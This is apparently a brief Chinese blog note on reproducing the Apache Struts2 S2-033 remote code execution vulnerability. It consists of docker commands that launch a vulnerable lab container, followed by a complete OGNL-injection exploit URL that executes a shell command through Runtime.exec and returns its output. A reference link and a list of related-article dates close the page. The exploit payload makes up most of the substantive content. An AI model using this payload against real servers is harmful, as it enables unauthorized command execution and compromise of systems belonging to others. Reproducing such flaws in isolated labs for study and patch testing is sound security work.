docker pull medicean/vulapps:s_struts2_s2-033

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033

EXP:

http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id

  

漏洞复现:Struts2 远程代码执行漏洞(S2-033)漏洞复现:Struts2 远程代码执行漏洞(S2-033)

参考:http://vulapps.evalbug.com/s_struts2_s2-033/

相关文章:

  • 2021-06-08
  • 2021-09-19
  • 2021-05-17
  • 2021-07-02
  • 2021-09-29
  • 2021-10-30
  • 2021-04-26
  • 2021-05-27
猜你喜欢
  • 2021-08-10
  • 2021-08-01
  • 2022-01-01
  • 2021-07-10
  • 2021-05-22
  • 2021-06-09
  • 2021-05-29
  • 2021-10-07
相关资源
相似解决方案